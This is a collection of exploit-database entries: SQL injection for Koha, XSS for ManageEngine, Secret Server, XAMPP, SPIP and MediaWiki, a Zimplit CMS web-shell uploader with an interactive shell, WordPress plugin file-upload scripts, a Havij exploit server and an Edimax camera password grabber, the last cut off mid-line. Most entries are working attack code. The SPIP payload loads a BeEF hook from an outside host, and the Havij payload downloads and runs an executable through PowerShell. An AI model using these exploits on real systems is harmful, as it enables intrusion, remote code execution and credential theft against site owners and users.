186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002 echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002
-
Title: =============== ManageEngine Asset Explorer v6.1 - XSS Vulnerability CVE-ID: ==================================== CVE-2015-2169 CVSS: ==================================== 3.5 Product & Service Introduction (Taken from their homepage): ==================================== ManageEngine AssetExplorer is a web-based IT Asset Management (ITAM) software that helps you monitor and manage assets in your network from Planning phase to Disposal phase. AssetExplorer provides you with a number of ways to ensure discovery of all the assets in your network. You can manage software & hardware assets, ensure software license compliance and track purchase orders & contracts - the whole nine yards! AssetExplorer is very easy to install and works right out of the box. (Homepage: https://www.manageengine.com/products/asset-explorer/ ) Abstract Advisory Information: ============================== Cross site scripting attack can be performed on the manage engine asset explorer. If the 'publisher' name contains vulnerable script, it gets executed in the browser. Affected Products: ==================== Manage Engine Product: Asset Explorer - Web Application 6.1.0 (Build 6112) Severity Level: ==================== Medium Technical Details & Description: ================================ Add a vendor with a script in it to the registry. Login to the product, Scan the endpoint where the registry is modified. In the right pane, go to software->Scanned Software The script gets executed. Vulnerable Product(s): ManageEngine Asset Explorer Affected Version(s): Version 6.1.0 / Build Number 6112 (Earlier versions i did not test) Vulnerability Type(s): Persistent Cross Site Scripting PoC: ======================= Add the following registry entry in the machine, for targeted attack. Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fake_Software] "DisplayName"="A fake software 2 installed" "UninstallString"="C:\\Program Files\\fake\\uninst.exe" "DisplayVersion"="0.500.20" "URLInfoAbout"="http://www.dummy.org" "Publisher"="<script> alert(\"XSS\"); </script>" Security Risk: ================== Medium. Credits & Authors: ================== Suraj Krishnaswami (suraj.krishnaswami@gmail.com) Timeline: ================== Discovered at Wed, March 3, 2015 Informed manage engine about the vulnerability: March 4, 2015 Case moved to development team: March 4, 2015 Asked for updates: March 9, 2015 Asked for updates: March 13, 2015 Asked for updates: April 14, 2015 Public Disclosure at Mon, June 22, 2015
-
############################################################# # # COMPASS SECURITY ADVISORY # http://www.csnc.ch/en/downloads/advisories.html # ############################################################# # # CVE ID : CVE-2015-3443 # Product: Secret Server [1] # Vendor: Thycotic # Subject: Stored Cross-Site Scripting Vulnerability (XSS) # Risk: High # Effect: Remotely exploitable # Author: Marco Delai (marco.delai@csnc.ch) # Date: June 24th 2015 # ############################################################# Introduction: ------------- Thycotic Secret Server enterprise password management software allows the creation, management and control of critical passwords in one centralized, web-based repository [1]. The identified vulnerability (stored Cross-Site Scripting) allows the execution of JavaScript code in the browser of a valid user when it toggle the password mask on a specially crafted password. This allows, for example, an attacker to prepare a specially crafted shared password, which when read by another user, can steal all other passwords the victim has access to. Vulnerable: ----------- Secret Server customers on version 8.6.000000 to 8.8.000004 [2]. Technical Details -------------------- Exploiting the vulnerability simply requires to: 1. Create a new password entry within Secret Server with the following value: "Compass Security<script>alert("Compass Security")</script>" 2. Open the basic dashboard and toggle the password mask. The password is retrieved from the server using an AJAX call and its value is added straight to the page's DOM without validation. Thus, the script included in step 1 is executed. Note that the payload defined in step 1 did only get executed in the basic dashboard view. The advanced dashboard did adequately encode the password. Extract of the vulnerable page: GET /SecretServer/api.ashx/simplehome/GetSecretItemValue?secretItemId=[...]&audi tAction=unmask HTTP/1.1 HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Content-Length: 62 Content-Type: application/json; charset=utf-8 Expires: -1 [...] Content-Security-Policy: connect-src 'self'; font-src 'self'; frame-src 'self' sslauncher:; img-src 'self' data:; media-src 'self'; object-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' 'unsafe-eval' X-Content-Security-Policy: connect-src 'self'; font-src 'self'; frame-src 'self' sslauncher:; img-src 'self' data:; media-src 'self'; object-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' 'unsafe-eval' X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-UA-Compatible: IE=edge "Compass Security<script>alert(\"Compass Security\")</script>" Remediation: ------------ Update Secret Server to the latest version, which fixes the vulnerability [2]. Milestones: ----------- 2015-02-19 Vulnerability discovered 2015-02-20 Vulnerability reported to vendor 2015-02-20 Vendor patch [2] 2015-06-24 Public disclosure References: ----------- [1] http://thycotic.com/products/secret-server/ [2] http://thycotic.com/products/secret-server/resources/advisories/thy-ss-004/
-
source: https://www.securityfocus.com/bid/53979/info XAMPP for Windows is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/xampp/perlinfo.pl/"<script>alert("XSS")</script> http://www.example.com/xampp/cds.php/%27onmouseover=alert%28%22XSS%22%29%3E http://www.example.com/xampp/cds.php?interpret=1&jahr=1967 and sleep(1) &titel=555-666-0606
-
source: https://www.securityfocus.com/bid/53983/info SPIP is prone to multiple unspecified cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Versions prior to SPIP 2.0.20, 2.1.15, and 3.0.2 are vulnerable. Exploit generator: ------------------ <html> <head> <script> function trim(s){ return s.replace(/\r\n|\r|\n|\t/g,'').replace(/^\s+/g,'').replace(/\s+$/g,''); } function encodeToHex(s){ var r=""; var h; for(var c=0;c<s.length;c++){ h=s.charCodeAt(c).toString(16); while(h.length<3) h="%"+h; r+=h; } return r; } function generateXSS(){ var target = trim(document.getElementById("target").value); var version = trim(document.getElementById("version").value); var content = trim(document.getElementById("content").value); var resultjs = ""; resultjs += "<html><body><form name='x' action='" + target + "ecrire/?exec=" + version + "' method='post'>"; resultjs += "<input type='hidden' name='exec' value='" + version + "' />"; resultjs += "<input type='hidden' name=\"x'><script>eval(unescape('" + encodeToHex(content) + "'));<\/script><input=\" value='' />"; resultjs += "</form><script>document.forms['x'].submit();<\/script></body></html>"; document.getElementById("resultjs").value = resultjs; } </script> </head> <body onload="generateXSS();"> <h2>XSS in SPIP Core <=3.0.1 or <=2.1.14 admin panel (base repair)</h2> <p> This XSS, non-persistent, use POST vars through admin panel.<br /> The target is the attribute "name" of an input markup hidden.<br /> This XSS work on Firefox 13, IE7, but doesn't work on Chrome.<br /> Magic_quote_gcp = Off needed. </p> <form action="" onsubmit="generateXSS();return false;"> <table> <tr> <td>URL's SPIP Targeted :</td> <td><input id="target" type="text" value="http://target/spip/" size="70" onkeyup="generateXSS();" /></td> </tr> <tr> <td>SPIP version :</td> <td> <select id="version" onchange="generateXSS();"> <option value="base_repair">3.0.X (up to 3.0.1 included)</option> <option value="admin_repair">2.1.X (up to 2.1.14 included)</option> </select> </td> </tr> <tr> <td>JavaScript code to execute :<br />(without <script> & </script> markup)</td> <td> <textarea cols="70" rows="10" id="content" onkeyup="generateXSS();"> alert(document.cookie); var script = document.createElement("script"); script.type = "text/javascript"; script.src = "http://ha.ck.er.xxx/beEf.js"; document.body.appendChild(script); </textarea> </td> </tr> <tr> <td>Exploit to send to an admin : </td> <td> <textarea cols="70" rows="10" id="resultjs" readonly="readonly"></textarea> </td> </tr> </table> </form> </body> </html>
-
source: https://www.securityfocus.com/bid/53990/info Zimplit CMS is prone to multiple local file-include vulnerabilities and an arbitrary file-upload vulnerability. An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information. Zimplit CMS 3.0 is vulnerable; other versions may also be affected. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ### # Title : Zimplit CMS v3.0 <= (FU/XSRF/LFI) Multiple Vulnerabilities # Author : KedAns-Dz # E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com) # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) # Web Site : www.1337day.com | www.inj3ct0rs.com # FaCeb0ok : http://fb.me/Inj3ct0rK3d # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com * www.dis9.com # platform : php # Type : Multiple Vulnerabilities # Tested on : Windows XP-SP3 (Fr) / Ubuntu 10.10 (En) # Download : [http://www.zimplit.com/order.html] ### # <3 <3 Greetings t0 Palestine <3 <3 # Exploit's / p0c's ====> ##### Exp(1) Arbitrary File/Shell Upload => <!-- p0c (1) --> <?php error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { $sock = fsockopen($host, 80); while (!$sock) { print "\n[-] No response from {$host}:80 Trying again..."; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) $resp .= fread($sock, 1024); fclose($sock); return $resp; } print "\n|==================================================|"; print "\n| Zimplit CMS v3.0 <= Arbitrary Shell Upload |"; print "\n| Provided By KedAns-Dz <ked-h[at]hotmail[.]com> |"; print "\n|==================================================|\n"; if ($argc < 2) { print "\nUsage : php $argv[0] [host] [path]"; print "\nExample : php $argv[0] www.p0c.tld /zimplit/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $data = "--31337\r\n"; $data .= "Content-Disposition: form-data; name=\"File\"; filename=\"k3d.php\"\r\n"; $data .= "Content-Type: application/octet-stream\r\n\r\n"; $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n"; $data .= "--31337--\r\n"; $packet = "POST {$path}/zimplit.php?action=upload&folder=editor/files HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($data)."\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=31337\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $data; preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html); if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n"); else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n"; define(STDIN, fopen("php://stdin", "r")); while(1) { print "\n Inj3ct0rK3d-Sh3lL#"; $cmd = trim(fgets(STDIN)); # f.ex : C:\\k3d.php if ($cmd != "exit") { $packet = "GET {$path}k3d.php{$html[3]} HTTP/1.0\r\n"; $packet.= "Host: {$host}\r\n"; $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; # for Encoded You'r Shell $packet.= "Connection: close\r\n\r\n"; $output = http_send($host, $packet); if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n"); $shell = explode("_code_", $output); print "\n{$shell[1]}"; } else break; } ?> <!-- p0c (2) --> <form action="http://[Target]/zimplit.php?action=upload&folder=editor/files" method="post"> <input type="file" name="file" size="50"/> <input type="hidden" name="file" /> <input type="submit" value="Upload Sh3ll/File !" /> </form> [+] Access Shell http://[Target]/editor/files/k3d.php [+] Access Shell http://[Target]/editor/files/{ U R Shell }.* ##### Exp(2) Edit HTML (index.html) File => <form action='http://[target]/zimplit.php?action=save&file=index.html' method='post'> <textarea id="html" name="html"> <center> <h1> HaCked By KedAns-Dz </h1> </center> </textarea> <input type='submit' value='Edit HTML Page'> </form> ##### Exp(3) Add new HTML File/Page => <form action='http://[target]/zimplit.php?action=new&file=dz0.html' method='post'> <textarea id="html" name="html"> <center> <h1> HaCked By KedAns-Dz </h1> </center> </textarea> <input type='submit' value='Creat new HTML Page'> </form> ##### Exp(4) Local File Include => <!-- p0c (1) --> <form action='http://[target]/zimplit.php?action=load&file=../../../../../../../[ LFI ]%00' method='post'> <input type='submit' value='Included Local File'> </form> <!-- p0c (2) --> <?php $lfi = curl_init("http://[Target]/editor/zimplit_js.php"); curl_setopt($lfi, CURLOPT_POST, true); curl_setopt($lfi, CURLOPT_POSTFIELDS, array('lang'=>"../../../../../../../../[ LFI ]%00")); curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($lfi); curl_close($lfi); print "$postResult"; ?> <!-- p0c (3) --> <?php $lfi = curl_init("http://[Target]/editor/user.php"); curl_setopt($lfi, CURLOPT_POST, true); curl_setopt($lfi, CURLOPT_POSTFIELDS, array('lang'=>"../../../../../../../../[ LFI ]%00")); curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($lfi); curl_close($lfi); print "$postResult"; ?> #### << ThE|End #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=============================================== # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w # +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * HD Moore # Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke # JF * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Barbaros-DZ # packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs #============================================================================================================
-
source: https://www.securityfocus.com/bid/53994/info Evarisk plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. Evarisk 5.1.5.4 is vulnerable; other versions may also be affected. <?php $headers = array("Content-Type: application/octet-stream"); $uploadfile="<?php phpinfo(); ?>"; $ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/evarisk/include/lib/actionsCorrectives/activite/uploadPhotoApres.php?qqfile=lo.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>
-
#!/usr/bin/php <?php # Title : Havij OLE Automation Array Remote Code Execution # Affected Versions: All Version # Founder : ITSecTeam # Tested on Windows 7 / Server 2008 # # # Author : Mohammad Reza Espargham # Linkedin : https://ir.linkedin.com/in/rezasp # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com # Website : www.reza.es # Twitter : https://twitter.com/rezesp # FaceBook : https://www.facebook.com/mohammadreza.espargham # # # OleAut32.dll Exploit MS14-064 CVE2014-6332 # # # 1 . run php code : php havij.php # 2 . open "Havij" and Enter your exploit link http://ipaddress:80/ # 3 . go to "Setting" and Click "Load Cookie" # 4 . Your Link Download/Execute on your target # 5 . Finished ;) #Youtube : https://www.youtube.com/watch?v=svU8SuJhaVY $port=80; # Port Address $link="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; # Your exe link $reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); socket_bind($reza, 0,$port); socket_listen($reza); print " Mohammad Reza Espargham\n www.reza.es\n\nYour Link = http://ipaddress:$port / http://127.0.0.1:$port\n\n"; $msg = 'PGh0bWw+CjxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RW11 bGF0ZUlFOCIgPgo8aGVhZD4KPC9oZWFkPgo8Ym9keT4KIAo8U0NSSVBUIExBTkdVQUdFPSJWQlNj cmlwdCI+CgpmdW5jdGlvbiBydW5tdW1hYSgpIApPbiBFcnJvciBSZXN1bWUgTmV4dApzZXQgc2hl bGw9Y3JlYXRlb2JqZWN0KCJTaGVsbC5BcHBsaWNhdGlvbiIpCmNvbW1hbmQ9Ikludm9rZS1FeHBy ZXNzaW9uICQoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdG SUxFX0RPV05MT0FEJywnbG9hZC5leGUnKTskKE5ldy1PYmplY3QgLWNvbSBTaGVsbC5BcHBsaWNh dGlvbikuU2hlbGxFeGVjdXRlKCdsb2FkLmV4ZScpOyIKc2hlbGwuU2hlbGxFeGVjdXRlICJwb3dl cnNoZWxsLmV4ZSIsICItQ29tbWFuZCAiICYgY29tbWFuZCwgIiIsICJydW5hcyIsIDAKZW5kIGZ1 bmN0aW9uCjwvc2NyaXB0PgogCjxTQ1JJUFQgTEFOR1VBR0U9IlZCU2NyaXB0Ij4KICAKZGltICAg YWEoKQpkaW0gICBhYigpCmRpbSAgIGEwCmRpbSAgIGExCmRpbSAgIGEyCmRpbSAgIGEzCmRpbSAg IHdpbjl4CmRpbSAgIGludFZlcnNpb24KZGltICAgcm5kYQpkaW0gICBmdW5jbGFzcwpkaW0gICBt eWFycmF5CiAKQmVnaW4oKQogCmZ1bmN0aW9uIEJlZ2luKCkKICBPbiBFcnJvciBSZXN1bWUgTmV4 dAogIGluZm89TmF2aWdhdG9yLlVzZXJBZ2VudAogCiAgaWYoaW5zdHIoaW5mbywiV2luNjQiKT4w KSAgIHRoZW4KICAgICBleGl0ICAgZnVuY3Rpb24KICBlbmQgaWYKIAogIGlmIChpbnN0cihpbmZv LCJNU0lFIik+MCkgICB0aGVuIAogICAgICAgICAgICAgaW50VmVyc2lvbiA9IENJbnQoTWlkKGlu Zm8sIEluU3RyKGluZm8sICJNU0lFIikgKyA1LCAyKSkgICAKICBlbHNlCiAgICAgZXhpdCAgIGZ1 bmN0aW9uICAKICAgICAgICAgICAgICAKICBlbmQgaWYKIAogIHdpbjl4PTAKIAogIEJlZ2luSW5p dCgpCiAgSWYgQ3JlYXRlKCk9VHJ1ZSBUaGVuCiAgICAgbXlhcnJheT0gICAgICAgIGNocncoMDEp JmNocncoMjE3NikmY2hydygwMSkmY2hydygwMCkmY2hydygwMCkmY2hydygwMCkmY2hydygwMCkm Y2hydygwMCkKICAgICBteWFycmF5PW15YXJyYXkmY2hydygwMCkmY2hydygzMjc2NykmY2hydygw MCkmY2hydygwKQogCiAgICAgaWYoaW50VmVyc2lvbjw0KSB0aGVuCiAgICAgICAgIGRvY3VtZW50 LndyaXRlKCI8YnI+IElFIikKICAgICAgICAgZG9jdW1lbnQud3JpdGUoaW50VmVyc2lvbikKICAg ICAgICAgcnVuc2hlbGxjb2RlKCkgICAgICAgICAgICAgICAgICAgIAogICAgIGVsc2UgIAogICAg ICAgICAgc2V0bm90c2FmZW1vZGUoKQogICAgIGVuZCBpZgogIGVuZCBpZgplbmQgZnVuY3Rpb24K IApmdW5jdGlvbiBCZWdpbkluaXQoKQogICBSYW5kb21pemUoKQogICByZWRpbSBhYSg1KQogICBy ZWRpbSBhYig1KQogICBhMD0xMysxNypybmQoNikKICAgYTM9NyszKnJuZCg1KQplbmQgZnVuY3Rp b24KIApmdW5jdGlvbiBDcmVhdGUoKQogIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgZGltIGkKICBD cmVhdGU9RmFsc2UKICBGb3IgaSA9IDAgVG8gNDAwCiAgICBJZiBPdmVyKCk9VHJ1ZSBUaGVuCiAg ICAgICBDcmVhdGU9VHJ1ZQogICAgICAgRXhpdCBGb3IKICAgIEVuZCBJZiAKICBOZXh0CmVuZCBm dW5jdGlvbgogCnN1YiB0ZXN0YWEoKQplbmQgc3ViCiAKZnVuY3Rpb24gbXlkYXRhKCkKICAgIE9u IEVycm9yIFJlc3VtZSBOZXh0CiAgICAgaT10ZXN0YWEKICAgICBpPW51bGwKICAgICByZWRpbSAg UHJlc2VydmUgYWEoYTIpICAKICAgCiAgICAgYWIoMCk9MAogICAgIGFhKGExKT1pCiAgICAgYWIo MCk9Ni4zNjU5ODczNzQzNzgwMUUtMzE0CiAKICAgICBhYShhMSsyKT1teWFycmF5CiAgICAgYWIo Mik9MS43NDA4ODUzNDczMTMyNEUtMzEwICAKICAgICBteWRhdGE9YWEoYTEpCiAgICAgcmVkaW0g IFByZXNlcnZlIGFhKGEwKSAgCmVuZCBmdW5jdGlvbiAKIAogCmZ1bmN0aW9uIHNldG5vdHNhZmVt b2RlKCkKICAgIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgICBpPW15ZGF0YSgpICAKICAgIGk9cnVt KGkrOCkKICAgIGk9cnVtKGkrMTYpCiAgICBqPXJ1bShpKyZoMTM0KSAgCiAgICBmb3Igaz0wIHRv ICZoNjAgc3RlcCA0CiAgICAgICAgaj1ydW0oaSsmaDEyMCtrKQogICAgICAgIGlmKGo9MTQpIHRo ZW4KICAgICAgICAgICAgICBqPTAgICAgICAgICAgCiAgICAgICAgICAgICAgcmVkaW0gIFByZXNl cnZlIGFhKGEyKSAgICAgICAgICAgICAKICAgICBhYShhMSsyKShpKyZoMTFjK2spPWFiKDQpCiAg ICAgICAgICAgICAgcmVkaW0gIFByZXNlcnZlIGFhKGEwKSAgCiAKICAgICBqPTAgCiAgICAgICAg ICAgICAgaj1ydW0oaSsmaDEyMCtrKSAgIAogICAgICAgICAgCiAgICAgICAgICAgICAgIEV4aXQg Zm9yCiAgICAgICAgICAgZW5kIGlmCiAKICAgIG5leHQgCiAgICBhYigyKT0xLjY5NzU5NjYzMzE2 NzQ3RS0zMTMKICAgIHJ1bm11bWFhKCkgCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9uIE92ZXIoKQog ICAgT24gRXJyb3IgUmVzdW1lIE5leHQKICAgIGRpbSB0eXBlMSx0eXBlMix0eXBlMwogICAgT3Zl cj1GYWxzZQogICAgYTA9YTArYTMKICAgIGExPWEwKzIKICAgIGEyPWEwKyZoODAwMDAwMAogICAK ICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkgCiAgICByZWRpbSAgIGFiKGEwKSAgICAgCiAgIAog ICAgcmVkaW0gIFByZXNlcnZlIGFhKGEyKQogICAKICAgIHR5cGUxPTEKICAgIGFiKDApPTEuMTIz NDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwCiAgICBhYShhMCk9MTAKICAgICAgICAgICAKICAg IElmKElzT2JqZWN0KGFhKGExLTEpKSA9IEZhbHNlKSBUaGVuCiAgICAgICBpZihpbnRWZXJzaW9u PDQpIHRoZW4KICAgICAgICAgICBtZW09Y2ludChhMCsxKSoxNiAgICAgICAgICAgICAKICAgICAg ICAgICBqPXZhcnR5cGUoYWEoYTEtMSkpCiAgICAgICAgICAgaWYoKGo9bWVtKzQpIG9yIChqKjg9 bWVtKzgpKSB0aGVuCiAgICAgICAgICAgICAgaWYodmFydHlwZShhYShhMS0xKSk8PjApICBUaGVu ICAgIAogICAgICAgICAgICAgICAgIElmKElzT2JqZWN0KGFhKGExKSkgPSBGYWxzZSApIFRoZW4g ICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICB0eXBlMT1WYXJUeXBlKGFhKGExKSkKICAg ICAgICAgICAgICAgICBlbmQgaWYgICAgICAgICAgICAgICAKICAgICAgICAgICAgICBlbmQgaWYK ICAgICAgICAgICBlbHNlCiAgICAgICAgICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTApCiAgICAg ICAgICAgICBleGl0ICBmdW5jdGlvbgogCiAgICAgICAgICAgZW5kIGlmIAogICAgICAgIGVsc2UK ICAgICAgICAgICBpZih2YXJ0eXBlKGFhKGExLTEpKTw+MCkgIFRoZW4gICAgCiAgICAgICAgICAg ICAgSWYoSXNPYmplY3QoYWEoYTEpKSA9IEZhbHNlICkgVGhlbgogICAgICAgICAgICAgICAgICB0 eXBlMT1WYXJUeXBlKGFhKGExKSkKICAgICAgICAgICAgICBlbmQgaWYgICAgICAgICAgICAgICAK ICAgICAgICAgICAgZW5kIGlmCiAgICAgICAgZW5kIGlmCiAgICBlbmQgaWYKICAgICAgICAgICAg ICAgCiAgICAgCiAgICBJZih0eXBlMT0maDJmNjYpIFRoZW4gICAgICAgICAKICAgICAgICAgIE92 ZXI9VHJ1ZSAgICAgIAogICAgRW5kIElmICAKICAgIElmKHR5cGUxPSZoQjlBRCkgVGhlbgogICAg ICAgICAgT3Zlcj1UcnVlCiAgICAgICAgICB3aW45eD0xCiAgICBFbmQgSWYgIAogCiAgICByZWRp bSAgUHJlc2VydmUgYWEoYTApICAgICAgICAgIAogICAgICAgICAKZW5kIGZ1bmN0aW9uCiAKZnVu Y3Rpb24gcnVtKGFkZCkgCiAgICBPbiBFcnJvciBSZXN1bWUgTmV4dAogICAgcmVkaW0gIFByZXNl cnZlIGFhKGEyKSAgCiAgIAogICAgYWIoMCk9MCAgIAogICAgYWEoYTEpPWFkZCs0ICAgICAKICAg IGFiKDApPTEuNjk3NTk2NjMzMTY3NDdFLTMxMyAgICAgICAKICAgIHJ1bT1sZW5iKGFhKGExKSkg IAogICAgCiAgICBhYigwKT0wCiAgICByZWRpbSAgUHJlc2VydmUgYWEoYTApCmVuZCBmdW5jdGlv bgogCjwvc2NyaXB0PgogCjwvYm9keT4KPC9odG1sPg=='; $msgd=base64_decode($msg); $msgd=str_replace("FILE_DOWNLOAD",$link,$msgd); for (;;) { if ($client = @socket_accept($reza)) { socket_write($client, "HTTP/1.1 200 OK\r\n" . "Content-length: " . strlen($msgd) . "\r\n" . "Content-Type: text/html; charset=UTF-8\r\n\r\n" . $msgd); print "\n Target Checked Your Link \n"; } else usleep(100000); } ?>
-
source: https://www.securityfocus.com/bid/53995/info Invit0r plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. Invit0r 0.22 is vulnerable; other versions may also be affected. ders = array("Content-Type: application/octet-stream"); $uploadfile="<?php phpinfo(); ?>"; $ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/invit0r/lib/php-ofc-library/ofc_upload_image.php?name=lo.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>
-
source: https://www.securityfocus.com/bid/53998/info MediaWiki is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. MediaWiki versions prior to 1.17.5, 1.18.4, and 1.19.1 are vulnerable. http://www.example.com/wiki/Main_Page?uselang=a%27%20onmouseover=eval(alert(1))%20e=%27
-
source: https://www.securityfocus.com/bid/54006/info Edimax IC-3030iWn is prone to an information-disclosure vulnerability. Successful exploits will allow a remote attacker to gain access to sensitive information. Information obtained will aid in further attacks. #!/usr/bin/env python """ # Exploit Title: Edimax IC-3030iWn Web Admin Auth Bypass exploit # Date: 4 April 2012 # Exploit Author: y3dips@echo.or.id, @y3dips # URL: http://echo.or.id # Vendor Homepage: http://www.edimax.com # Sourcecode Link: http://www.edimax.com/en/produce_detail.php?pd_id=352&pl1_id=8&pl2_id=91 # Also Tested on: - Edimax IC-3015 - Airlive WN 500 # Bug found by: Ben Schmidt for RXS-3211 IP camera http://www.securityfocus.com/archive/1/518123 # To successfully automate your browser launch, change browser path. """ import socket import webbrowser import sys if len(sys.argv) != 2: print "Eg: ./edimaxpwned.py edimax-IP" sys.exit(1) port=13364 target= sys.argv[1] def read_pw(target, port): devmac = "\xff\xff\xff\xff\xff\xff" code="\x00\x06\xff\xf9" #for unicast reply data=devmac+code sock =socket.socket(socket.AF_INET,socket.SOCK_DGRAM) sock.connect((target,port)) try: sock.send(data) sock.settimeout(5) tmp = sock.recv(4096) return tmp except socket.timeout: return None def pwned_edi(): data=read_pw(target, port) if data != None: data=data[365:377] pw=data.strip("\x00") webbrowser.get("/Applications/Firefox.app/Contents/MacOS/firefox-bin %s" ).open('http://admin:'+pw+'@'+target+'/index.asp') else: print "Socket timeOut or not 